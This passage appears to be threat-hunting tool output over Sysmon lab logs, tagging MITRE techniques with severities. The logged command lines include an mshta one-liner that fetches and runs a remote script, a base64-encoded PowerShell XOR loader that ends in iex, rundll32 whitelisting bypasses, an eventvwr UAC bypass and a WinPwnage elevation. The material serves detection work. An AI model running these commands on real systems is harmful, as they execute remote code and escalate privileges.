GUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1557621160.342246,2019-05-12T04:32:40.342246+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1," 1 5 4 1 0 0x8000000000000000 16248 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 00:32:35.289 365ABB72-69A3-5CD7-0000-00109D7F2200 1860 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation c:\Windows\System32\cmd.exe C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-DC77-5CD7-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-69A3-5CD7-0000-001064792200 3432 C:\Windows\System32\taskeng.exe taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT AUTHORITY\System:Service: ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1564435998.310206,2019-07-30T01:33:18.310206+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); ),1," 1 5 4 1 0 0x8000000000000000 4902 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2019-07-29 21:33:18.241 747F3D96-661E-5D3F-0000-0010A3148700 776 C:\Windows\System32\cmd.exe 10.0.17763.1 (WinBuild.160101.0800) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-6053-5D3F-0000-002082314100 0x413182 1 High SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 747F3D96-6609-5D3F-0000-00109FBF8500 1208 C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969965.405337,2019-05-27T19:12:45.405337+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," 1 5 4 1 0 0x8000000000000000 6173 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:44.023 365ABB72-FE6C-5CEB-0000-0010050C0C00 3520 C:\Windows\System32\wbem\WMIC.exe 6.1.7600.16385 (win7_rtm.090713-1255) WMI Commandline Utility Microsoft® Windows® Operating System Microsoft Corporation C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 365ABB72-FE6B-5CEB-0000-00102A090C00 1536 C:\Windows\System32\cmd.exe cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe)",1," 1 5 4 1 0 0x8000000000000000 16452 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 14:18:09.573 365ABB72-2B21-5CD8-0000-001039DD2500 816 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2B1B-5CD8-0000-0010CCC92500 3320 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16452 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 14:18:09.573 365ABB72-2B21-5CD8-0000-001039DD2500 816 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2B1B-5CD8-0000-0010CCC92500 3320 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe )",1," 1 5 4 1 0 0x8000000000000000 16452 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 14:18:09.573 365ABB72-2B21-5CD8-0000-001039DD2500 816 C:\Windows\System32\rundll32.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\rundll32.exe" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe C:\Users\IEUser\ IEWIN7\IEUser 365ABB72-2523-5CD8-0000-00204C360100 0x1364c 1 Medium SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 365ABB72-2B1B-5CD8-0000-0010CCC92500 3320 C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1117] Bypassing Application Whitelisting,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222)",1," 1 5 4 1 0 0x8000000000000000 424115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.542 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational "[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," 1 5 4 1 0 0x8000000000000000 424115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.542 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [ T1086 ] Powershell with Suspicious Argument,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe") and Parent Image :C:\Windows\System32\eventvwr.exe , Parent CommandLine ("C:\Windows\system32\eventvwr.exe") in directory : ( C:\Windows\system32\ )",1," 1 5 4 1 0 0x8000000000000000 11116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 01:59:28.903 365ABB72-8980-5CD3-0000-0010134D1F00 3840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\ IEWIN7\IEUser 365ABB72-863B-5CD3-0000-00204A390100 0x1394a 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-8980-5CD3-0000-00105F451F00 3884 C:\Windows\System32\eventvwr.exe "C:\Windows\system32\eventvwr.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1085] Rundll32 Execution detected,1603490297.543898,2020-10-24T01:58:17.543898+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 )",1," 1 5 4 1 0 0x8000000000000000 424115 Microsoft-Windows-Sysmon/Operational MSEDGEWIN10 2020-10-23 21:58:17.542 747F3D96-51F9-5F93-0000-0010551E5E00 9116 C:\Windows\SysWOW64\rundll32.exe 10.0.17763.1 (WinBuild.160101.0800) Windows host process (Rundll32) Microsoft® Windows® Operating System Microsoft Corporation RUNDLL32.EXE "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 C:\Windows\system32\ MSEDGEWIN10\IEUser 747F3D96-4690-5F93-0000-002019A60800 0x8a619 1 Medium SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B 747F3D96-51F9-5F93-0000-001003125E00 7552 C:\Windows\System32\rundll32.exe Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 ",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558920560.034674,2019-05-27T05:29:20.034674+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName ),1," 1 5 4 1 0 0x8000000000000000 5976 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 01:29:19.994 365ABB72-3D6F-5CEB-0000-001032DBFF00 1900 C:\Windows\System32\inetsrv\appcmd.exe 7.5.7600.16385 (win7_rtm.090713-1255) Application Server Command Line Admin Tool Internet Information Services Microsoft Corporation "C:\Windows\System32\inetsrv\appcmd.exe" list vdir "Description: Cannot read configuration file due to insufficient permissions" /text:userName C:\Windows\Temp\ IIS APPPOOL\DefaultAppPool 365ABB72-B26B-5CEA-0000-002023240800 0x82423 0 High SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 365ABB72-3D4A-5CEB-0000-0010FA93FD00 2584 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1088] Bypass User Account Control - Process,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," 1 5 4 1 0 0x8000000000000000 11116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 01:59:28.903 365ABB72-8980-5CD3-0000-0010134D1F00 3840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\ IEWIN7\IEUser 365ABB72-863B-5CD3-0000-00204A390100 0x1394a 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-8980-5CD3-0000-00105F451F00 3884 C:\Windows\System32\eventvwr.exe "C:\Windows\system32\eventvwr.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1086] PowerShell Process found,1557367201.794022,2019-05-09T06:00:01.794022+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ),1," 1 5 4 1 0 0x8000000000000000 11116 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-09 01:59:28.903 365ABB72-8980-5CD3-0000-0010134D1F00 3840 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 6.1.7600.16385 (win7_rtm.090713-1255) Windows PowerShell Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\system32\ IEWIN7\IEUser 365ABB72-863B-5CD3-0000-00204A390100 0x1394a 1 High SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C 365ABB72-8980-5CD3-0000-00105F451F00 3884 C:\Windows\System32\eventvwr.exe "C:\Windows\system32\eventvwr.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1059] Command-Line Interface,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," 1 5 4 1 0 0x8000000000000000 6171 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:43.969 365ABB72-FE6B-5CEB-0000-00102A090C00 1536 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1047] Windows Management Instrumentation - Process,1558969964.055762,2019-05-27T19:12:44.055762+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state ),1," 1 5 4 1 0 0x8000000000000000 6171 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-27 15:12:43.969 365ABB72-FE6B-5CEB-0000-00102A090C00 1536 C:\Windows\System32\cmd.exe 6.1.7601.17514 (win7sp1_rtm.101119-1850) Windows Command Processor Microsoft® Windows® Operating System Microsoft Corporation cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name="VSS") get state C:\Windows\system32\ NT AUTHORITY\SYSTEM 365ABB72-7B40-5CEC-0000-0020E7030000 0x3e7 0 System SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 365ABB72-FD85-5CEB-0000-00104C0E0B00 1944 C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" ",IEWIN7,Microsoft-Windows-Sysmon/Operational [T1053] Scheduled Task - Process,1557621155.258262,2019-05-12T04:32:35.258262+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\schtasks.exe ) through command line ( "C:\Windows\System32\schtasks.exe" /run /tn elevator ),1," 1 5 4 1 0 0x8000000000000000 16245 Microsoft-Windows-Sysmon/Operational IEWIN7 2019-05-12 00:32:35.070 365ABB72-69A3-5CD7-0000-0010306F2200 3752 C:\Windows\System32\schtasks.exe 6.1.7600.16385 (win7_rtm.090713-1255) Manages scheduled tasks Microsoft® Windows® Operating System Microsoft Corporation "C:\Windows\System32\schtasks.exe" /run /tn elevator c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ IEWIN7\IEUser 365ABB72-5DEC-5CD7-0000-00204A380100 0x1384a 1 High SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9 365ABB72-6998-5CD7-0000-00104E422200 2740 C:\Python27\python.exe python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe 